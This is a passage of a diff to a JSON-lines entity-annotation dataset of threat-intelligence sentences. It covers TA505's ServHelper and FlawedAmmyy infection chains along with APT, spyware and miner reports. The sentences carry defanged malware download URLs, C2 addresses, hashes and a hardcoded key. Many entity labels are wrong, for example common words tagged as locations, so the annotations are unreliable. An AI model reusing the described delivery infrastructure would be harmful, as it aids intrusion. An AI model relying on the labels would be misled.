FlawedAmmyy downloader.","entities":[{"id":23887,"label":"location","start_offset":115,"end_offset":120},{"id":23889,"label":"location","start_offset":224,"end_offset":227},{"id":23890,"label":"malware","start_offset":246,"end_offset":257}],"relations":[],"Comments":[]} -{"id":7682,"text":".ISO, enabled macros for entry dropping ServHelper or FlawedAmmyy","entities":[{"id":23899,"label":"malware","start_offset":40,"end_offset":50},{"id":23900,"label":"malware","start_offset":54,"end_offset":65}],"relations":[],"Comments":[]} -{"id":7685,"text":"Emails with an attached .ISO image is an .LNK file that uses command line msiexec to execute an MSI file from a URL such as hxxp:\/\/139[.]180[.]195[.]36\/pm2.","entities":[],"relations":[],"Comments":[]} -{"id":7686,"text":"Figure 1. Infection chains for ServHelper installation Figure 2.","entities":[{"id":23911,"label":"malware","start_offset":31,"end_offset":41}],"relations":[],"Comments":[]} -{"id":7687,"text":"A sample of an .ISO file with an embedded .LNK file The pm2 file contains and runs another executable, which is an installer file created using Nullsoft Scriptable Install System (NSIS), a free script-driven installer authoring tool for Windows.","entities":[{"id":23913,"label":"location","start_offset":2,"end_offset":8},{"id":23914,"label":"location","start_offset":74,"end_offset":77},{"id":23915,"label":"malware","start_offset":180,"end_offset":184},{"id":23916,"label":"location","start_offset":228,"end_offset":232}],"relations":[],"Comments":[]} -{"id":7688,"text":"This NSIS-encapsulated file then installs ServHelper .","entities":[{"id":23917,"label":"malware","start_offset":5,"end_offset":9}],"relations":[],"Comments":[]} -{"id":7689,"text":"Figure 3.","entities":[],"relations":[],"Comments":[]} -{"id":7690,"text":".LNK shortcut in .ISO file","entities":[],"relations":[],"Comments":[]} -{"id":7692,"text":"The macros directly download the file created using NSIS installer from hxxp:\/\/45[.]67[.]229[.]36\/p2, which is the same binary we found in the .ISO and .LNK files that install ServHelper.","entities":[{"id":23922,"label":"malware","start_offset":52,"end_offset":56},{"id":23923,"label":"location","start_offset":115,"end_offset":119},{"id":23924,"label":"location","start_offset":148,"end_offset":151},{"id":23925,"label":"malware","start_offset":176,"end_offset":186}],"relations":[],"Comments":[]} -{"id":7693,"text":"Figure 4.","entities":[],"relations":[],"Comments":[]} -{"id":7696,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} -{"id":7697,"text":"Encrypted string We observed that some of the samples still had errors in the cipher routine.","entities":[],"relations":[],"Comments":[]} -{"id":7698,"text":"In another routine that was supposed to result in a stack overflow, it also displayed an error message.","entities":[],"relations":[],"Comments":[]} -{"id":7700,"text":"Figure 6.","entities":[],"relations":[],"Comments":[]} -{"id":7701,"text":"Vigenère cipher in ServHelper and the Delphi code in stack overflow","entities":[{"id":23937,"label":"malware","start_offset":19,"end_offset":29},{"id":23938,"label":"location","start_offset":30,"end_offset":33}],"relations":[],"Comments":[]} -{"id":7703,"text":"The encrypted sample — via XOR encoding\/URL encoding — also received a response from the C&C encrypted with XOR.","entities":[{"id":23942,"label":"location","start_offset":14,"end_offset":20},{"id":23943,"label":"attack-pattern","start_offset":40,"end_offset":52}],"relations":[],"Comments":[]} -{"id":7705,"text":" Figure 7. XOR Encrypted C&C communication","entities":[],"relations":[],"Comments":[]} +{"id":3508,"text":"The following is a list of Protux\u2019s notable components and their functions: FileManage - Lists all of the system\u2019s drives and folders.","entities":[{"id":49301,"label":"malware","start_offset":27,"end_offset":33}],"relations":[],"Comments":[]} +{"id":10275,"text":"showing","entities":[],"relations":[],"Comments":[]} +{"id":13621,"text":"This utility has a feature called \u201cImport Adder,\u201d while \u201c.newimp\u201d is the default name of a newly added section containing newly added imports.","entities":[],"relations":[],"Comments":[]} +{"id":12388,"text":"We terminated 8 YouTube channels as part of our actions against a coordinated influence operation linked to Yemen.","entities":[],"relations":[],"Comments":[]} +{"id":4421,"text":"x.TextContent.StartsWith(\"Review blocked sign-in attempt\") || x.TextContent.","entities":[],"relations":[],"Comments":[]} +{"id":5076,"text":"The earliest evidence we have of this exploit kit being actively deployed is January 4, 2022.","entities":[{"id":51186,"label":"TIME","start_offset":77,"end_offset":92}],"relations":[],"Comments":[]} +{"id":9881,"text":"The group puts up multiple layers of obfuscation to run these C&C servers in extremely targeted malware campaigns against organizations in the Middle East, the U.S., and Asia.","entities":[{"id":30117,"label":"attack-pattern","start_offset":87,"end_offset":103},{"id":30120,"label":"location","start_offset":166,"end_offset":169}],"relations":[],"Comments":[]} +{"id":4587,"text":" The vulnerability has been dubbed as ProxyLogon by the researchers at DEVCORE, who are credited with finding the bugs in the proxy architecture and the logon mechanism of Exchange.","entities":[{"id":50446,"label":"SOFTWARE","start_offset":172,"end_offset":180},{"id":50444,"label":"vulnerability","start_offset":38,"end_offset":48},{"id":50445,"label":"identity","start_offset":71,"end_offset":78}],"relations":[{"id":974,"from_id":50446,"to_id":50444,"type":"has"}],"Comments":[]} +{"id":5010,"text":"Google\u2019s Threat Analysis Group (TAG) has been closely monitoring the cybersecurity activity in Eastern Europe with regard to the war in Ukraine.","entities":[{"id":51063,"label":"identity","start_offset":0,"end_offset":36},{"id":51064,"label":"location","start_offset":95,"end_offset":109},{"id":51065,"label":"location","start_offset":136,"end_offset":143}],"relations":[],"Comments":[]} +{"id":9480,"text":"Table 2.","entities":[],"relations":[],"Comments":[]} +{"id":4186,"text":"Exploit public-facing application Execution T1059.001","entities":[{"id":49987,"label":"attack-pattern","start_offset":0,"end_offset":53}],"relations":[],"Comments":[]} +{"id":6667,"text":"VDI solutions can provide protection against a destructive malware like Disttrack through the ability to load snapshots of wiped systems to recover from a wiper attack.","entities":[{"id":20693,"label":"location","start_offset":14,"end_offset":17},{"id":20694,"label":"location","start_offset":26,"end_offset":36},{"id":20696,"label":"location","start_offset":105,"end_offset":109},{"id":20697,"label":"malware","start_offset":155,"end_offset":160}],"relations":[],"Comments":[]} +{"id":3987,"text":"The guideline thoroughly explains the three most common methods threat groups use to infiltrate the supply chain.","entities":[],"relations":[],"Comments":[]} +{"id":9422,"text":"In this stage, a blob of payload data is decrypted using a hard-coded key (2726c6aea9970bb95211304705b5f595) and what appears to be an RC4 (Rivest Cipher 4) algorithm.","entities":[{"id":29001,"label":"location","start_offset":59,"end_offset":63},{"id":29002,"label":"MD5","start_offset":75,"end_offset":107},{"id":29003,"label":"location","start_offset":109,"end_offset":112}],"relations":[],"Comments":[]} +{"id":9571,"text":"GET http:\/\/{C2}\/Index.php?Ck=OK HTTP\/1.1","entities":[{"id":29366,"label":"URL","start_offset":4,"end_offset":28}],"relations":[],"Comments":[]} +{"id":8809,"text":"Shortly after the U.S. Treasury sanctioned Ukrainian Parliament member Andrii Derkach for attempting to influence the U.S. electoral process, we removed 14 Google accounts that were linked to him.","entities":[],"relations":[],"Comments":[]} +{"id":7049,"text":"The launcher decrypts the data.res file with a different hardcoded DES key.","entities":[],"relations":[],"Comments":[]} +{"id":353,"text":"CHS\u2019s 8-K filing on Monday did not reveal how the attackers got into their network, only that the records of approximately 4.5 million patients were stolen in attacks in between April and June of 2014.","entities":[{"id":46048,"label":"identity","start_offset":0,"end_offset":3},{"id":46049,"label":"TIME","start_offset":20,"end_offset":26},{"id":46050,"label":"TIME","start_offset":178,"end_offset":184},{"id":46051,"label":"TIME","start_offset":188,"end_offset":200}],"relations":[],"Comments":[]} +{"id":9115,"text":"Lurk\u2019s transition from simple web-browser-exploiting crooks to organized cybercriminals also stood out.","entities":[{"id":28147,"label":"malware","start_offset":0,"end_offset":4},{"id":28148,"label":"location","start_offset":53,"end_offset":59}],"relations":[],"Comments":[]} +{"id":14008,"text":"The following sections describe the different correlations and are divided into two main categories: Correlation related to the malware author developing environment Correlation associated with TTPs Note that some leads are stronger than others; however, when combined, they suggest that the same threat actor behind malware previously attributed to APT37 is likely responsible for Operation Earth Kitsune.","entities":[{"id":47183,"label":"campaign","start_offset":384,"end_offset":407},{"id":43419,"label":"threat-actor","start_offset":352,"end_offset":357}],"relations":[],"Comments":[]} +{"id":106,"text":"Similarly, DarkSide operators used Mega client for exfiltrating files to cloud storage, 7-Zip for archiving, and PuTTY application for network file transfers.","entities":[{"id":45834,"label":"threat-actor","start_offset":11,"end_offset":29},{"id":45835,"label":"tools","start_offset":35,"end_offset":46},{"id":45836,"label":"tools","start_offset":88,"end_offset":93},{"id":45837,"label":"tools","start_offset":113,"end_offset":118}],"relations":[{"id":120,"from_id":45834,"to_id":45835,"type":"uses"},{"id":121,"from_id":45834,"to_id":45836,"type":"uses"},{"id":122,"from_id":45834,"to_id":45837,"type":"uses"}],"Comments":[]} +{"id":13582,"text":"The attack we found only works on Series 2 of EC-CUBE; the current version is Series 4, with Series 2 now under extended support.","entities":[{"id":51667,"label":"tools","start_offset":34,"end_offset":53},{"id":51668,"label":"tools","start_offset":78,"end_offset":86}],"relations":[],"Comments":[]} +{"id":1393,"text":"Read more on the XSOAR marketplace.","entities":[],"relations":[],"Comments":[]} +{"id":4719,"text":"In December 2021, we released research about novel techniques used by NSO Group to compromise iMessage users.","entities":[{"id":50617,"label":"TIME","start_offset":3,"end_offset":16},{"id":50618,"label":"threat-actor","start_offset":70,"end_offset":79},{"id":50619,"label":"SOFTWARE","start_offset":94,"end_offset":102}],"relations":[],"Comments":[]} +{"id":2768,"text":"They can be used to: These are all likely outcomes from mass scanning of the Internet for vulnerable hosts, which are already underway.","entities":[],"relations":[],"Comments":[]} +{"id":5257,"text":"Timestamps indicate that the earliest sample was signed on June 2015; the latest variant was signed on May 2017.","entities":[{"id":51296,"label":"TIME","start_offset":59,"end_offset":68},{"id":51297,"label":"TIME","start_offset":103,"end_offset":111}],"relations":[],"Comments":[]} +{"id":1731,"text":"Attackers can gain access to your personal and financial information.","entities":[],"relations":[],"Comments":[]} +{"id":1675,"text":"The user needs to know the IP of the infected client, the port used by malware and the encryption password to properly decode the traffic.","entities":[],"relations":[],"Comments":[]} +{"id":9960,"text":"They carried this out by first stealing the company\u2019s certificate then using it to sign the malware.","entities":[],"relations":[],"Comments":[]} +{"id":4736,"text":"The growth of commercial spyware vendors and hack-for-hire groups has necessitated growth in TAG to counter these threats.","entities":[{"id":50648,"label":"identity","start_offset":93,"end_offset":96}],"relations":[],"Comments":[]} +{"id":4445,"text":"It was last updated on July 29, 2022.","entities":[{"id":50219,"label":"TIME","start_offset":23,"end_offset":36}],"relations":[],"Comments":[]} +{"id":4198,"text":"OS Credential Dumping: Credentials in Registry Lateral Movement T1021.002","entities":[{"id":50004,"label":"attack-pattern","start_offset":0,"end_offset":73}],"relations":[],"Comments":[]} +{"id":10656,"text":"Vulnerabilities of Apache HTTP Server have increased since 2017 Open-source web servers, especially Apache HTTP Server, have been heavily exploited in the past five years.","entities":[{"id":32529,"label":"attack-pattern","start_offset":69,"end_offset":75}],"relations":[],"Comments":[]} +{"id":6952,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} +{"id":6115,"text":"The PlugX sample in Table 3 also uses the legitimate PixelPlus Co., Ltd certificate and was also targeted against the university.","entities":[{"id":18910,"label":"tools","start_offset":4,"end_offset":9},{"id":18911,"label":"location","start_offset":10,"end_offset":16},{"id":18914,"label":"location","start_offset":84,"end_offset":87},{"id":18915,"label":"location","start_offset":118,"end_offset":128}],"relations":[],"Comments":[]} +{"id":3410,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A ba44c22a3224c3a201202b69d86df2a78f0cd1d4ac1119eb29cae33f09027a9a Silverlight2.exe","entities":[{"id":10289,"label":"malware","start_offset":0,"end_offset":11},{"id":10290,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49090,"label":"malware","start_offset":20,"end_offset":44},{"id":49091,"label":"FILEPATH","start_offset":112,"end_offset":128}],"relations":[{"id":681,"from_id":10289,"to_id":49090,"type":"duplicate-of"},{"id":682,"from_id":49091,"to_id":10290,"type":"duplicate-of"},{"id":683,"from_id":49091,"to_id":49090,"type":"indicates"},{"id":684,"from_id":10290,"to_id":49090,"type":"indicates"}],"Comments":[]} +{"id":14243,"text":"We mapped Winnti\u2019s activities for this campaign by analyzing the dates exposed in GitHub.","entities":[{"id":48437,"label":"identity","start_offset":10,"end_offset":16},{"id":48438,"label":"SOFTWARE","start_offset":82,"end_offset":88}],"relations":[],"Comments":[]} +{"id":14308,"text":"Setup.exe is the core module used to steal data.","entities":[{"id":48529,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} +{"id":7166,"text":"This research is done in cooperation with IssueMakersLab of South Korea.","entities":[],"relations":[],"Comments":[]} +{"id":2103,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) A recent vulnerability in the Kerberos authentication protocol, CVE-2020-17049 (dubbed Bronze Bit), has been disclosed by Microsoft.","entities":[{"id":45392,"label":"identity","start_offset":175,"end_offset":184},{"id":45390,"label":"vulnerability","start_offset":117,"end_offset":131},{"id":45393,"label":"SOFTWARE","start_offset":83,"end_offset":91},{"id":45391,"label":"vulnerability","start_offset":140,"end_offset":150}],"relations":[{"id":95,"from_id":45391,"to_id":45390,"type":"duplicate-of"}],"Comments":[]} +{"id":1839,"text":"Searching for processes We found that aswArPot.sys, registered as aswSP_ArPot2 as a service, is used as the handle for the following DeviceIoControl call.","entities":[{"id":45144,"label":"FILEPATH","start_offset":42,"end_offset":54}],"relations":[],"Comments":[]} +{"id":13384,"text":"Attacker Owned Domains: ","entities":[],"relations":[],"Comments":[]} +{"id":2499,"text":" Palo Alto Networks Cortex XSOAR customers can leverage the \"Spring Core and Cloud Function SpEL RCEs\" pack to automatically detect and mitigate the vulnerabilities.","entities":[{"id":47597,"label":"vulnerability","start_offset":61,"end_offset":101},{"id":47596,"label":"SOFTWARE","start_offset":1,"end_offset":32}],"relations":[],"Comments":[]} +{"id":5445,"text":"But, mobile banking use is picking up around the globe.","entities":[],"relations":[],"Comments":[]} +{"id":7026,"text":"SysUpdate was first described by the NCC Group in 2018.","entities":[{"id":22036,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} +{"id":13699,"text":"Confirm requests using other channels.","entities":[],"relations":[],"Comments":[]} +{"id":6345,"text":"Figure 9 is a screenshot of the default Windows File Explorer; \u201cshow hidden files\u201d is not checked.","entities":[],"relations":[],"Comments":[]} +{"id":9384,"text":"We also conclude that this is the initial phase of an attack based on the following reasons: CallerSpy, as it is now, could prove uneven for a targeted attack.","entities":[],"relations":[],"Comments":[]} +{"id":1358,"text":"Later that day, a public PoC surfaced, allowing organizations to better understand this vulnerability and how it is exploited.","entities":[{"id":4075,"label":"TIME","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} +{"id":2464,"text":"However, in many cases the filename had an extension that would not support a webshell, such as .js and .txt, which we believe was used just to mark the presence of a successful file upload as part of vulnerable server discovery efforts.","entities":[],"relations":[],"Comments":[]} +{"id":4559,"text":"In this case, the Android app name was stopwar.apk (com.ddos.stopwar) and was distributed from the website stopwar.pro.","entities":[{"id":50373,"label":"SOFTWARE","start_offset":18,"end_offset":25},{"id":50375,"label":"malware","start_offset":52,"end_offset":68},{"id":50376,"label":"DOMAIN","start_offset":107,"end_offset":118},{"id":50374,"label":"malware","start_offset":39,"end_offset":50}],"relations":[],"Comments":[]} {"id":7709,"text":" The newer version shows that the developers behind ServHelper continued to upgrade it to evade detection and add more functions, possibly for even more iterations in the future.","entities":[{"id":23958,"label":"malware","start_offset":52,"end_offset":62},{"id":23959,"label":"location","start_offset":106,"end_offset":109}],"relations":[],"Comments":[]} -{"id":7710,"text":"In a campaign targeting thousands of Korean businesses, we found an .ISO attachment — used as the malicious downloader — disguised as a confirmed flight ticket from a popular airline. Figure 8. TA505 spoofing an airline company as a malicious file attachment.","entities":[{"id":23960,"label":"location","start_offset":5,"end_offset":13},{"id":23964,"label":"threat-actor","start_offset":195,"end_offset":200}],"relations":[],"Comments":[]} -{"id":7711,"text":"In a slightly different technique still targeting Korean enterprises, the .ISO files either contained an .LNK file such as the previous iteration, or a .NET-compiled downloader.","entities":[],"relations":[],"Comments":[]} -{"id":7712,"text":"Figure 9. Infection chains for FlawedAmmyy installation Figure 10.","entities":[{"id":23967,"label":"malware","start_offset":31,"end_offset":42}],"relations":[],"Comments":[]} -{"id":7713,"text":"Screenshot of decompiled script from the .ISO file with a .NET downloader embedded in the e-ticket.","entities":[],"relations":[],"Comments":[]} -{"id":7714,"text":"Other samples also included an Excel file attachment with malicious macros that install FlawedAmmyy, or a URL included in the email that supposedly downloads the file needed to download the malware.","entities":[{"id":23970,"label":"malware","start_offset":88,"end_offset":99}],"relations":[],"Comments":[]} -{"id":7715,"text":" Figure 11. .LNK embedded in the .ISO file","entities":[],"relations":[],"Comments":[]} -{"id":7716,"text":"Both versions tried to download and execute files km1 or km2, an .MSI installer that executes the FlawedAmmyy downloader.","entities":[{"id":23972,"label":"location","start_offset":32,"end_offset":35},{"id":23973,"label":"malware","start_offset":98,"end_offset":109}],"relations":[],"Comments":[]} -{"id":7717,"text":"This, in turn, downloads an RC4-encrypted FlawedAmmyy RAT payload from hxxp:\/\/92[.]38[.]135[.]67\/2.dat or hxxp:\/\/27[.]102[.]70[.]196\/1.dat that automatically decrypts and executes the malware.","entities":[{"id":23974,"label":"tools","start_offset":42,"end_offset":53},{"id":23975,"label":"location","start_offset":167,"end_offset":170}],"relations":[],"Comments":[]} -{"id":7720,"text":"Opening the documents will enable the macros and download the same FlawedAmmyy downloader as the .ISO file iteration from hxxp:\/\/92[.]38[.]135[.]67 or hxxp:\/\/27[.]102[.]70[.]196, with filenames k1 or k2.","entities":[{"id":23979,"label":"location","start_offset":22,"end_offset":26},{"id":23980,"label":"location","start_offset":45,"end_offset":48},{"id":23981,"label":"location","start_offset":62,"end_offset":66},{"id":23982,"label":"tools","start_offset":67,"end_offset":78}],"relations":[],"Comments":[]} -{"id":7722,"text":"Infection chains for ServHelper installation with .NET downloader","entities":[{"id":23988,"label":"malware","start_offset":21,"end_offset":31}],"relations":[],"Comments":[]} -{"id":7724,"text":"The .NET downloads jm1 — an .MSI installer — that installs another NSIS installer, leading to a ServHelper infection in the system.","entities":[{"id":23993,"label":"malware","start_offset":67,"end_offset":71},{"id":23994,"label":"malware","start_offset":96,"end_offset":106}],"relations":[],"Comments":[]} -{"id":7725,"text":"Figure 13.","entities":[],"relations":[],"Comments":[]} -{"id":7726,"text":"The decompiled .NET downloader","entities":[],"relations":[],"Comments":[]} -{"id":7727,"text":"In another routine, an Excel file attachment downloads the NSIS installer once the user enables the malicious macros from hxxp:\/\/109[.]234[.]37[.]15:80\/j1 or hxxp:\/\/169[.]239[.]128[.]170\/j1.","entities":[{"id":23997,"label":"malware","start_offset":59,"end_offset":63}],"relations":[],"Comments":[]} -{"id":7729,"text":"More typical TA505 campaigns, with old and new targets","entities":[{"id":23999,"label":"threat-actor","start_offset":13,"end_offset":18},{"id":24000,"label":"location","start_offset":39,"end_offset":42}],"relations":[],"Comments":[]} -{"id":7732,"text":"Enabling the macros of the Excel file downloads a file created using NSIS installer with ServHelper from 79[.]141[.]168[.]105 or 195[.]123[.]213[.]126.","entities":[{"id":24012,"label":"malware","start_offset":69,"end_offset":73},{"id":24013,"label":"tools","start_offset":89,"end_offset":99},{"id":24014,"label":"IPV4","start_offset":105,"end_offset":125},{"id":24015,"label":"IPV4","start_offset":129,"end_offset":150}],"relations":[],"Comments":[]} -{"id":7734,"text":"The emails used in these campaigns used subjects pertaining to finance or urgent concerns on insurance policies.","entities":[],"relations":[],"Comments":[]} -{"id":7736,"text":"Similar to the routine variant in Figure 6, the Excel VBA macros retrieve the FlawedAmmyy downloader from hxxp:\/\/195[.]123[.]245[.]185\/r1 or hxxp:\/\/185[.]225[.]17[.]5\/r1, in then decrypts and executes FlawedAmmyy RAT from hxxp:\/\/185[.]225[.]17[.]5\/2.dat or hxxp:\/\/195[.]123[.]245[.]185\/1.dat.","entities":[{"id":24027,"label":"location","start_offset":48,"end_offset":53},{"id":24028,"label":"malware","start_offset":78,"end_offset":89},{"id":24029,"label":"location","start_offset":188,"end_offset":191},{"id":24030,"label":"malware","start_offset":201,"end_offset":212}],"relations":[],"Comments":[]} -{"id":7737,"text":"Meanwhile, the .DOC VBA macros retrieves the MSI files from hxxp:\/\/195.123.245.185\/km or hxxp:\/\/185.225.17.5\/km, which executes the NSIS installer for ServHelper installation.","entities":[{"id":24031,"label":"malware","start_offset":132,"end_offset":136},{"id":24032,"label":"tools","start_offset":151,"end_offset":161}],"relations":[],"Comments":[]} -{"id":7740,"text":"Figure 14.","entities":[],"relations":[],"Comments":[]} -{"id":7741,"text":"One of the more typical techniques employed by TA505. .DLL downloaders that deliver FlawedAmmyy and newly styled macros","entities":[{"id":24047,"label":"tools","start_offset":84,"end_offset":95},{"id":24048,"label":"location","start_offset":96,"end_offset":99}],"relations":[],"Comments":[]} -{"id":7743,"text":"While FlawedAmmyy RAT was still the final payload, the downloader was different — this operation used a .DLL variant.","entities":[{"id":24051,"label":"malware","start_offset":6,"end_offset":17}],"relations":[],"Comments":[]} -{"id":7745,"text":"Figure 15.","entities":[],"relations":[],"Comments":[]} -{"id":7746,"text":"Infection chain with .DLL FlawedAmmyy downloader","entities":[{"id":24055,"label":"malware","start_offset":26,"end_offset":37}],"relations":[],"Comments":[]} -{"id":7747,"text":"The attached document asks the user to enable the macros, which creates an Internet Explorer object instance.","entities":[],"relations":[],"Comments":[]} -{"id":7750,"text":"Figure 16.","entities":[],"relations":[],"Comments":[]} -{"id":7752,"text":"Figure 17.","entities":[],"relations":[],"Comments":[]} -{"id":7753,"text":"Text file using Internet Explorer for communication to bypass firewall rules.","entities":[],"relations":[],"Comments":[]} -{"id":7754,"text":"The downloaded file is a text file with a single number on each line.","entities":[],"relations":[],"Comments":[]} -{"id":7755,"text":"The macros process the downloaded payload with each number encrypted in XOR with a constant hardcoded value of 106.","entities":[],"relations":[],"Comments":[]} -{"id":7757,"text":" Figure 18.","entities":[],"relations":[],"Comments":[]} -{"id":7759,"text":"The unpacked payload in memory is also a .DLL — it's the first time we've seen a FlawedAmmyy downloader as a .DLL.","entities":[{"id":24072,"label":"location","start_offset":63,"end_offset":67},{"id":24073,"label":"malware","start_offset":81,"end_offset":92}],"relations":[],"Comments":[]} -{"id":7760,"text":"As we further analyzed the main behavior by downloading the encrypted FlawedAmmyy RAT and decrypted it with RC4, we found that it was similar to the previous campaigns, but with a few updates.","entities":[{"id":24074,"label":"malware","start_offset":70,"end_offset":81},{"id":24075,"label":"location","start_offset":86,"end_offset":89}],"relations":[],"Comments":[]} -{"id":7761,"text":"The first update is the use of the socket API to send an HTTP request instead of wininet or winhttp API to download an encrypted FlawedAmmyy, building an HTTP header by itself.","entities":[{"id":24077,"label":"malware","start_offset":129,"end_offset":140}],"relations":[],"Comments":[]} -{"id":7762,"text":"This could likely be an effort to bypass API hooking for HTTP.","entities":[{"id":24078,"label":"location","start_offset":11,"end_offset":17},{"id":24079,"label":"location","start_offset":24,"end_offset":30},{"id":24080,"label":"attack-pattern","start_offset":45,"end_offset":52}],"relations":[],"Comments":[]} -{"id":7763,"text":"Figure 19.","entities":[],"relations":[],"Comments":[]} -{"id":7764,"text":"Send HTTP request using socket API","entities":[],"relations":[],"Comments":[]} -{"id":7765,"text":"The second change: The decrypted FlawedAmmyy RAT is now saved as dllhots.exe in C:\\temp\\ (it used to be saved as wsus.exe).","entities":[{"id":24083,"label":"malware","start_offset":33,"end_offset":44}],"relations":[],"Comments":[]} -{"id":7766,"text":"Lastly, this new FlawedAmmyy downloader overwrites some PE header members with random values.","entities":[{"id":24084,"label":"malware","start_offset":17,"end_offset":28}],"relations":[],"Comments":[]} +{"id":6636,"text":" https:\/\/unit42.paloaltonetworks.com\/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government\/ https:\/\/unit42.paloaltonetworks.com\/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east\/ https:\/\/unit42.paloaltonetworks.com\/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications\/","entities":[],"relations":[],"Comments":[]} +{"id":13280,"text":"Snapshot of code we used to decrypt TClient\u2019s configuration Figure 11.","entities":[{"id":41375,"label":"malware","start_offset":36,"end_offset":43}],"relations":[],"Comments":[]} +{"id":11796,"text":"Although Play Store users were protected, we are highlighting the app here as TAG has seen APT35 attempt to distribute this spyware on other platforms as recently as July 2021.","entities":[{"id":36377,"label":"location","start_offset":45,"end_offset":48},{"id":36378,"label":"threat-actor","start_offset":91,"end_offset":96}],"relations":[],"Comments":[]} +{"id":4423,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") select x).ToList","entities":[],"relations":[],"Comments":[]} +{"id":3390,"text":"test4.exe BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 3589e53c59d9807cca709387bbcaaffc7e24e15d9a78425b717fc55c779b928e","entities":[{"id":10240,"label":"malware","start_offset":11,"end_offset":22},{"id":10241,"label":"SHA2","start_offset":57,"end_offset":121},{"id":49042,"label":"FILEPATH","start_offset":0,"end_offset":9},{"id":49043,"label":"malware","start_offset":31,"end_offset":55}],"relations":[{"id":592,"from_id":49042,"to_id":49043,"type":"indicates"},{"id":593,"from_id":10241,"to_id":49043,"type":"indicates"},{"id":594,"from_id":10240,"to_id":49043,"type":"duplicate-of"},{"id":595,"from_id":49042,"to_id":10241,"type":"duplicate-of"}],"Comments":[]} +{"id":1151,"text":"And \u201cjh\u201d is always followed by a key from the left side of the keyboard.","entities":[],"relations":[],"Comments":[]} +{"id":2210,"text":"This leads us to the next stage of our malware This particular stage of malware acts as a downloader.","entities":[],"relations":[],"Comments":[]} +{"id":10937,"text":" Conclusion ","entities":[],"relations":[],"Comments":[]} +{"id":9782,"text":"It is important that employers and employees across all organizations and enterprises be able to identify phishing attacks and distinguish legitimate emails from malicious ones.","entities":[{"id":29795,"label":"location","start_offset":31,"end_offset":34},{"id":29796,"label":"location","start_offset":70,"end_offset":73},{"id":29797,"label":"attack-pattern","start_offset":106,"end_offset":114},{"id":29798,"label":"location","start_offset":123,"end_offset":126}],"relations":[],"Comments":[]} +{"id":9472,"text":"This is the main client binary written in C++, which is the last stage of PuppetLoader\u2019s infection chain.","entities":[{"id":29101,"label":"malware","start_offset":74,"end_offset":86}],"relations":[],"Comments":[]} +{"id":1020,"text":" Other sellers were also able to offer customizable email accounts from a specific domain\/institution.","entities":[],"relations":[],"Comments":[]} +{"id":6955,"text":" Figure 10.","entities":[],"relations":[],"Comments":[]} +{"id":2755,"text":" vulnerable this is a test ","entities":[],"relations":[],"Comments":[]} +{"id":1526,"text":" Similar to any other malware family or threat, Palo Alto Networks customers should use the entire security framework for threat mitigation and threat prevention coverage. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":46788,"label":"identity","start_offset":48,"end_offset":66}],"relations":[],"Comments":[]} +{"id":13556,"text":"This campaign appears to be financially motivated.","entities":[],"relations":[],"Comments":[]} +{"id":4094,"text":"All data will then be encrypted and sent back. Figure 8.","entities":[],"relations":[],"Comments":[]} +{"id":13990,"text":" Tags Cloud | APT & Targeted Attacks | Expert Perspective | Articles, News, Reports | Cyber Threats","entities":[],"relations":[],"Comments":[]} +{"id":7418,"text":"Indicators of Compromise (IoCs) SHA256 Description Detection Name 1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa Cryptocurrency miner Trojan.SH.MALXMR.UWEJP b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d Shellbot Backdoor.SH.SHELLBOT.AA 620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976 Tool Trojan.Linux.SSHBRUTE.B fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL32 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79 Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL64 URLs 159[.]203[.]141[.]208 104[.]236[.]192[.]6 45[.]9[.]148[.]129:80 Miner pool 45[.]9[.]148[.]125:80 Miner pool http:\/\/www[.]minpop[.]com\/sk12pack\/idents.php Command and control http:\/\/www[.]minpop[.]com\/sk12pack\/names.php Command and control MITRE ATT&CK Matrix Tags Malware | APT & Targeted Attacks | Endpoints | IoT | Research | Network","entities":[{"id":23053,"label":"SHA2","start_offset":67,"end_offset":131},{"id":23054,"label":"location","start_offset":147,"end_offset":152},{"id":23055,"label":"MD5","start_offset":176,"end_offset":240},{"id":23056,"label":"SHA1","start_offset":274,"end_offset":338},{"id":23057,"label":"location","start_offset":339,"end_offset":343},{"id":23058,"label":"SHA1","start_offset":368,"end_offset":432},{"id":23059,"label":"location","start_offset":448,"end_offset":453},{"id":23060,"label":"malware","start_offset":454,"end_offset":463},{"id":23061,"label":"SHA2","start_offset":485,"end_offset":549},{"id":23062,"label":"location","start_offset":565,"end_offset":570},{"id":23063,"label":"malware","start_offset":571,"end_offset":580},{"id":23064,"label":"IPV4","start_offset":610,"end_offset":631},{"id":23065,"label":"IPV4","start_offset":633,"end_offset":652},{"id":23066,"label":"location","start_offset":681,"end_offset":686},{"id":23067,"label":"location","start_offset":687,"end_offset":691},{"id":23068,"label":"location","start_offset":721,"end_offset":726},{"id":23069,"label":"location","start_offset":727,"end_offset":731},{"id":23070,"label":"URL","start_offset":733,"end_offset":758},{"id":23071,"label":"location","start_offset":795,"end_offset":798},{"id":23072,"label":"URL","start_offset":808,"end_offset":833},{"id":23073,"label":"location","start_offset":870,"end_offset":873},{"id":23074,"label":"location","start_offset":930,"end_offset":933}],"relations":[],"Comments":[]} +{"id":12424,"text":"The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains.","entities":[],"relations":[],"Comments":[]} +{"id":1825,"text":"We noted the unusual use of cmd.exe for execution of the file.","entities":[{"id":5374,"label":"malware","start_offset":28,"end_offset":35}],"relations":[],"Comments":[]} 